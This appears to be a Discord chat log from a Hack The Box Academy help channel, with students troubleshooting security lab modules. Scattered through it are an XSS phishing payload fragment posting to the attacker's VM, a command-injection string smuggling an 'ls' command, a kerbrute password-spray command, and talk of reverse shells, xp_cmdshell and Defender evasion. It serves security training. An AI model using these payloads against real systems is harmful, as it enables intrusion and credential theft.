I think the instance I have is bugged, but I am not able to get a new ip. Every time I try to refresh the ip it gives the same one.
just modify the code a bit
look the source and look at your payload, i was able to make it look nice
Was about to say the same, you beat me to it
I used the exact code that the module showed.
Doesn't work
Hence why they said modify it a bit
Find what element you need to change
yeah but the section shows you how you can look at the source and fix it if you want, i don't think it's required to complete the question
Modify what part?
the section teaches you this, you look at the source, the tags, the elements, etc, and then you can modify your payload and tweak it to the page
I checked all that and it matched up with the code that was given in the module.
well there's your problem
the section provides an example, if you want to clean it up you have to know the material and adjust it to match the assessment part
copying the code there isn't going to work
Yeah I just don't know what to change. The page source matches up with what was in the module.
In terms of the payload
Have another look through the Reflected XSS module - while you are indeed using the payload stated in the module, there's a bit more you need to do in order to achieve the end goal
Checking the dev console on the browser might also hint as to what the problem is 🙂
look at the characters that display that you don't want to see, then look at your code or the source code to see where the characters are that are causing it. if it's before the username/password fields then look before that code. if it's after, then look after that code. if you find something you think may be it, you can remove it and test it. you can also add junk characters to get an idea of where things are being inserted.
I got rid of the special characters, but the removal of the url box is not working
I'd recommend reading over the section that goes over this again, you're going to need to look for an ElementID that you can remove
I'm also having issues spawning, USW
This is what I'm getting
USE and EU1,EU2 for me too lol
What is the issue?
nah i just messed with it
gotta make it into a js
It's a url form
Lame advice, but have you refreshed the page? While it should trigger with an event to update the UI, I've seen it not do so sometimes
What do you mean by make it a script?
It's definitely the servers
did that a few times, no success 🙂
it means make it into a script element
it's fairly easy
Na a refresh just reset it. Gonna click it again. Maybe third time is the charm
my server came up now
What would that look like? I don't see that anywhere in the section.
and it worked
look at the start where it tries to have you get an alert
just throw that around your payload (and close out the previous html tag before it)
Where is this covered? One of the previous sections?
is this the XSS module?
Yeah
for this section
the phishing section
yeah, you should probably, y'know.. turn it into a script
well you likely put them in the wrong spot then
This is what I got
it worked fine for me ¯\_(ツ)_/¯
That same script?!
uh is there an error in that payload
i can't tell
...h3><form action=http://myvmip>/<input...
nah
that's not where it is
the document.write isn't closed
it's missing a closing ')
ok i guess it just looks weird
i started with '<h3> and then just put the <script> to remove the element at the end
look before the document.getElementByID, you need to close the document.write() before the ;
you can wrap the whole payload in <script>
idk, i didn't do it that way
i'm just saying that is a way you can do it
i customized the payload off the source code of the page
:) ik because that's literally what I did
oh yeah i'm sure you can
That gave me this
brother
you really need to go over the section again
I have multiple times
</form>; this is where your error is
analyze the source code of the page, customize the payload off the source code
look at the tags, what's being closed, etc
you still didn't close the quote
I don't get why this isn't working, the rest of my payloads were working
Which quote?
you have a quote before '<h3>
Ok.. love that you want to keep trying to help Marcie, but could you take it to DM if you want to continue please
so you need to close it with one
Literally walking through a T2 module section here 😅
that's fair
it's also basic troubleshooting and scanning for errors
Oh, got it
I saw an open (' and no closing ')
I must have taken that out in a previous step
takes 5 seconds to scan for it
I was getting a
')
before so I took that out
:P
which is where it broke because it took everything with the first ; onward as still part of the first document function
How did you do it without <script>?
it says right there that they used <script>
they put it in a different spot
because if you look at the source it doesn't need it, you can just use the existing code and put the script at the end to remove the elementid
there are multiple ways to do it
What would that look like?
i mentioned it earlier, but my payload just started with '<h3> and ended with </form> and then i did the elementid removal with <script> at the end
ohhhh i see what you're saying
What about the document.write(
??
because of where it's injected
right
that's the element removal part at the end
ahhh i just did what you are suggesting, IMO looks a lot nicer
Good insight
now i'm curious what yours looks like lol i thought the end result was the same
dm
it looks similar
like SLIGHT difference
Do you guys mind sending me your payloads in a dm so I can see?
I finally got it but I want to see how you both did it too if you don't mind please
imo i just looked at the page source to see what was being referenced
look at the page source where the payload is
then play around with it
Submit the contents of the flag.txt file on the Administrator Desktop on the SQL01 host.
AD Skill Assessment 2.
I can't seem to get an interactive shell on the SQL01. I found the password from the file in the previous question, I suppose it's linked to the mssqlsvc account.
I used sqsh, but it doesn't work. I tried PowerUpSQL but it has no connection.
Any ideas?
The way in which I'm using what I learned in Password Attacks in Attacking Common Services is seriously epic. This is a very smart way to have these modules stack on one another.
wrap the pw in single quotes
oh wait you might need to do more enum
sniff snaff around for it
FYI, the Academy dept are updating the Introduction to Shell section to add some extra info around special characters following the case the other day 😉
awesome!
the file should also have the user
There was a very small mention to escape in there, but yeah, definitely needed some more info
is the windows vm in common services supposed to be this slow?
5 mins to show the desktop via rdp
That doesn't sound right.. what's your latency to the VPN you're connected to looking like?
sounds like potential connection issues
damn
if you ping the target IP what's the avg ping ping -c 5 $IP
the latency to the EU vpns has been pretty bad the past few weeks
If ping shows an ok response time but high packet loss, switch out to TCP connection pack instead
I had to switch to US vpn
switched to US
yea but that's 350 ping
on the academy page
damn daniel
change vpn regions and respawn the target
ok
also use the TCP download
100% loss seems very off.. there were issues, and AFAIK were resolved, but if the incident is still up on the status page either someone forgot to take it down, or the issues has reoccurred
Have you switched already @ebon minnow ?
yep
Ok, nevermind then, wanted to have a poke about
Hope you have better luck on the different VPN
yeah its faster, still a slideshow but much better than last time 😄
I'm unsure if this is the right place for the following message but I'm just curious and wondering if subcribing for the hackthebox academy would actually give me access to the labs too
Ooo, so I ain't got all the info yet, understood. I thought that one of the accounts I found mssqlsvc might be for it, but sure. I will sniff a bit more.
Ty for the update.
?
What do you mean the file has the user..
the password is right; and the question tells you it's in a connection string
Ohhh the ...got it
Doesn't matter, I should've been able to see it.
I will probs be back if I don't get further but I will read around.
I was a bit desperate.
Now, let's try.
Worked!! We got the mssql shell.
HTB Labs and HTB Academy are two separate platforms and subscriptions for now
I'm stuck at (server side attacks --> Blind SSRF Exploitation Example). I don't think I understand the (We should be thorough during penetration tests and look for the blind counterparts of different vulnerability classes) part. I tried everything that came to my mind and still it didn't work. I'm glad for any help
Subscription to one does not grant a subscription to the other
would be a nice boon for annual since SSO is almost in full swing
Was that a question?
Marcie
I need me a tip. See I got the shell, I can do stuff with xp_cmdshell.
Problem being that when I try to extract the flag, it says I have no perms.
I suppose there's gotta be a password or something in those DBs.
2 of them are empty as hell, 4th is full of b4lls and the first, I haven't found anything, I will search again.
Now I can try to upload a reverse shell to the C: Of sql 1 and open it from the xp_cmd shell.
Which can give me some sort of access, but I still don't have the rights for the administrator.
spoofing is interesting
or even potatoes
Wasn't that man in the middle.
SeImpersonate privs
there's a handful of exploits that relate
Gonna get to it, then.
🫡
Why is it sometimes that HTB just loves giving teasers for the next module. Skill assessment 1 was proxies. Now privilege escalation.
Need some help on Predictable Token Reset - Question 1. Are we supposed to iterate thru the milliseconds? I attempted to brute force with increment of 1000 (1s) but couldn't get it
everything you need to do has been covered by the module
it's +/- 1s UTC
bruh fr fr im on
Active Directory Enumeration & Attacks
Page 11
Internal Password Spraying - from Linux
Internal Password Spraying - from Linux i made list
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 user.txt Welcome1
and it doesn't work, why
52 usernames, I tried mlowe@inlanefreight.local and then again with mlowe
wait a bit or reset the lab, kerberos didn't start properly
Module: Attacking Common Services
Section: RDP
Question: Connect via RDP with the Administrator account and submit the flag.txt as you answer.
Issue: I disabled the reg key and have the correct hash, connecting with admin creds using PTH isn't working for some reason
@swift grail I don't respond to unsolicited DMs. Can you ask your question here please?
On HTTP Attacks skills assessment, can someone confirm for me (perhaps via DM if it's spoilers) that the smuggled request's response is supposed to appear nested within the initial request's response?
Does that mean I'm doing something wrong?
Edit: The response should appear in the second Burp tab.
Make sure you spray with usernames.
Not emails.
Also kerbrute sometimes plays a bit.
Try some other tools.
Hey, saw you ask about common services earlier in January. Specifically the last question about RDP section. Do you happen to know any tips?
Yeah it bugged out like crazy.
It should work once you disable the stuff.
With the reg add hklm or whatever it was.
Damn
I had to reset lab 6 times.
Second time resetting and disabling, I’ll try a couple more times then lol
Get into DMs rq
Oh snap lol
Hi, it's not supposed to be nested, no 😄 But if you can see the smuggled response then you should be able to solve the lab regardless 🙂 If you want me to look into it feel free to DM me with the requests you are sending
Hi, I am doing the YARA & Sigma for SOC Analysts module and I am stuck on "Developing YARA Rules". The question I'm stuck on:
Perform string analysis on the "DirectX.dll" sample that resides in the "/home/htb-student/Samples/YARASigma" directory of this section's target. Then, study the "apt_apt17_mal_sep17_1.yar" YARA rule that resides in the "/home/htb-student/Rules/yara" directory and replace "X.dll" with the correct DLL name to ensure the rule will identify "DirectX.dll". Enter the correct DLL name as your answer. Answer format: _.dll
I went into the Rule "apt_apt17_mal_sep17_1.yar" and switched it out. But how do I run it after I changed it? I can't find it anywhere, what am I supposed to do after I change it to get the DLL name?
You may have misunderstood the question. The goal is not to replace "X.dll" with "DirectX.dll" (as I understand, this is what you did). What you should do is perform string analysis on DirectX.dll and change "X.dll" such that running the rule on DirectX.dll would yield a hit. The section provides examples on how to perform string analysis on binaries. You do not need to run the rule to answer this question, but you can do so to verify you got the correct answer.
As for how to run Yara rules, you can just read the next section of the module, i.e. Hunting Evil with YARA (Windows Edition) Subsection Hunting for Malicious Executables on Disk with YARA
Am I the only one who can't do anything on the module because my VPN connection crashes after 60 seconds every time?
Does the VPN connection itself disconnect, or the connection to the target machine? Did you try a different Server and/or TCP instead of UDP?
hello everyone, can someone tell me how to complete the task - https://academy.hackthebox.com/module/80/section/779
if possible, I will write messages in private messages
hi
has anyone had issues installing oracle database attacking tool in the section oracle tns in the module footprinting?
Specifically i have issues pip installing pycrypto library
instead of pycrypto install pycryptodome
thank you
hello guys, in smtp user enumeration. In the web services enumeration module it doesn't instruct us to add the -D flag while in the attacking web services module it does. What exactly is the difference between querying a full email address and querying a single username... does each case have a specific use?
what are u using to do the user enumeration
and which script/executable are you meaning for the -D flag
How long did you wait to perform a full port scan? It's taking too long for me...
Stuck at decoding the cookie for 'Skills Assessment - Broken Authentication'. Any tips? Try many combination in CyberChef with no luck
I'm stuck at the module of FOOTPRINTING - DNS enumeration, the last question is about the FQDN of the host with the last octet finishing with .203
Can someone help me understand how can i solve this?
I turned off all of them for security reasons but it still didn't work.
did you figure this one out?
yes
can I dm?
++++++++
Hi guys, how much time should i spend to bruteforce password in this module ? https://academy.hackthebox.com/module/147/section/1391 I created wordlist using materials in resources section. And my tools tell me that it would take 9-14 hours
9 to 14 hours is without a doubt way too long. Check the cheat sheet for the right wordlist
I used both wordlists (passwords and rules) from "resources"
test
odat.py is able to bruteforce user accounts on an oracle db
it seems to use it's own userlist files
can we provide it a user list?
How can I install regsvr32.exe bcs this command not working regsvr32.exe SocksOverRDP-Plugin.dll
Your regserver command is missing arguments
When performing zone transfers, pay attention to the IPs in the right column
use the mut_password list and || maybe not the smartest choice to attack || || SSH service ||
can someone help me with this one
module COMMAND INJECTION / Bypassing Other Blacklisted Characters
hint Use the PATH environment variable along with the injection character you identified earlier
Subdomains of subdomains
This answer isn't obtained by simple zone transfer methods
If a subdomain allows for zone transfer you shouldn't try to bruteforce it anymore as you have all the subdomains associated with it... Also try different wordlists start with a short one and move your way up. Seclists has some good wordlists for subdomain enumeration
Howdy! Quick question to the nmap pros here: While using the -D (decoy) function, why is nmap still sending packets from the real IP if it can spoof and send packets from other generated IPs? I'm failing to see the purpose for nmap to place our real IP in between the generated IPs (network enumeration module - firewall and ids/ips evasion).
By placing your real IP among many other fakes, it will lessen your chances of being blocked by an IPS
Interesting, thanks a lot.

use %0a instead of ${LS_COLORS:10:1} as it has blocked
start HTB academy
How to start ?
I am a complete noob so I would appreciate your guidenc
*guidence
127.0.0.1%0a${PATH:0:1}home
this is what i am using
use ls command to list users name
127.0.0.1%0a$ls{PATH:0:1}home
here ?
use space filter between %0a and ls
"${IFS}"
DM me
@rustic sage
i tried and still didnt work
127.0.0.1%0a${IFS}ls${IFS}${PATH:0:1}home
thanks
thanks that makes sense
don't solve question so fast
first read and understand the sections
you will get the answer
msg you accept my request
i will
Is anyone else having or had problems logging into htb?
hi, in the section for IPMI in module footprinting. I have successfully obtained a hash. I tried the wordlist in the module resources so far
now i'm looking at the seclists.
use rockyou
i am trying to import powersploit on a Win 10 vm, I added a windows defender exception for the directory where I cloned the repo, yet windows defender still blocks the import-module cmdlet. Is there anything I am missing, do I need to add something else to prevent windows defender from interacting with this directory ?
standard rockyou has 14344392 lines, use that
Are you an admin, can you disable real time monitoring ?
yes, I can, but then what is the point of even having the exclusion list ?
ipmo loads it into the memory, it's not path dependent
thanks found it, it's in /usr/share/wordlists
hey probably really stupid question, is it worth documenting the same stuff over and over
like if i have multiple flags and i'm doing write ups, is it worth documenting opening powershell from cmd for every flag
So you mean that I should just run strings and do an analysis on DirectX.dll and I should be able to find the answer? There are a lot of examples in this and I'm not sure which one to use. I have tried all of them but I'm not really sure what I'm looking for and what to "replace"
Elo guys, where do I report a bug
since you know how to open powershell it's not that ness to explain.. but getting the flag and how u got it on a higher level can be super useful
I’m stuck on the intro to white box pentesting - blind exploitation section. I can confirm that my PoC works since I’m able to execute a sleep command and I’m also able to find the file and sequentially execute a sleep command. Has anyone done this?
Any Japanese?
yes i do
ask your question and someone may be able to help
but i don't think there are that many who can speak japanese
no, i mean i like japan. i need to learn Japanese as well
imi wakannai..
it's wakaranai
i know what i said..
alright then
why do i feel like i got punched in the gut... 😭
Hello guys,
Pivot Module - Skill assessment
Question-6
I extracted the information in the lsass file and found the user and password, but I could not find the next machine. When I scan Nmap, all hosts show up.
when is the binary fuzzing module release date

what's the nmap command
-sn disables port scanning, proxychains doesn't do ICMP, so what are you scanning?
also /16 has 65534 hosts, maybe try a smaller subnet first
I'm trying to find the IP of the DC machine. I will log in with the information I extracted from the lsass file and complete the module.
yea, changed to 1-200
I know, I'm telling you that -sn disables port scanning, proxychains doesn't do ICMP, so nothing is actually going through
understand disable -sn
anyone in trouble to spawn targets??
If Anyone can give me a nudge on the skills assessment for the module "NTLM RELAY ATTACKS" please DM me!
just ask your question
I'm pretty stuck on the skills assessment, I believe I've tried everything I could but to no avail. I'm out of ideas atm any nudge?
how do we give you a nudge if we don't know what you're stuck on? just ask your question
I don't know how to reach BACKUP01 can you please help me find a way? edit: by reach I mean compromise
.... what have you tried, what's not working, etc
wow! it was today
pivoting module completed -_-
i can spawn targets but i can't connect
I have trouble getting a connection back from the box, I think it's VPN / HTB internet related because the exploit works when you run the exact same code locally
Turns out my firewall just doesn't display the running config and you should check your firewall via refresh on fedora every time.
can you ping the target?
oh no not again
@ocean night its happening again
that with the icons in the academy
make sure the box didn't die, refresh the page and maybe spawn the target again. after that make sure you're connected to the correct vpn.
Could be FontAwesome had another brief outage
Yeah, like the icons in module view?
i have dementia so i cant complete it
Not seeing any network errors either
it happened right after submitting flag
😦
idk
Clear cache? Off and on again?
how do i clear cache?
fontawsome is fonthorrible
oh it might be my kali
checked from windows, works fine
sorry for the bother